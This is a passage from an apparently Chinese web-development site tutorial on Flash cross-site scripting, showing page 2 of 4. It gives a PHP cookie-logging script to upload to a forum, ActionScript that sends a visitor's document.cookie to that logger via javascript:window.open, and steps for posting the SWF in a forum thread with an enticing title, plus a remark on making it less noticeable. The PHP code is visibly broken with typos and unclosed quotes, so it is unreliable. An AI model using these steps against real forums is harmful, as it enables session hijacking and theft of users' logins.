WEB开发网
开发学院网络安全安全技术 解析Flash跨站脚本攻击 阅读

解析Flash跨站脚本攻击

 2008-01-09 13:12:26 来源:WEB开发网   
核心提示: http://192.168.0.5/flash/cookies_flash.asp2、PHP脚本第一步:PHP论坛和ASP论坛一样,把如下代码保存为cookies_flash.php:<?php$info=getenv('query_srring');if(info

http://192.168.0.5/flash/cookies_flash.asp

2、PHP脚本

第一步:PHP论坛和ASP论坛一样,把如下代码保存为cookies_flash.php

<?php
$info=getenv('query_srring');
if(info){
$fp=fopen('cookies.txt,'a');
fwrite($fp,$info,'
);
fclose($fp);
}
?>

第二步:上传cookies_flash.phpPHP论坛根目录,比如URL地址为:

http://192.168.0.5/flash/cookies_flash.php

提示:由于ASP和PHP的Flash脚本跨站攻击方式类似,因此我们就以比较大众的ASP论坛来演示。

(二)准备Flash

第一步:运行Flash 8.0,创建一个影片,在第一帧中右键选择“动作”,输入如下代码:

  getURL("javascript:window.open('http://192.168.0.5/flash/cookies_flash.asp?sg=$#39;+document.cookie')");

解析Flash跨站脚本攻击

图1

第二步:导出影片为cookies.swf上传到论坛中,我们把它复制到测试论坛的根目录中,其URL地址为:

http://192.168.0.5/flash/cookies.swf

补充:插入如上代码创建的Flash文件,在网页打开是会闪,不够隐蔽。用如下代码可以解决这个问题:

(上面的代码分两部分,第一部分是定义了PUrl,并对其的属性进行了设置,包括调用的页面以及页面的属性。第二部分是通过FLASH的getURL函数调用PUR1)

二、攻击演示

1.获取信息

第一步:打开论坛http://192.168.0.5/flash,注册一个用户flash_test,然后点击发表新帖,然后在标题中写入比较有诱惑力的话语,在正文中通过Flash标签插入刚才精心准备的Flash的URL地址,即http://192.168.0.5/flash/cookies.swf。(图2)

上一页  1 2 3 4  下一页

Tags:解析 Flash 脚本

编辑录入:爽爽 [复制链接] [打 印]
赞助商链接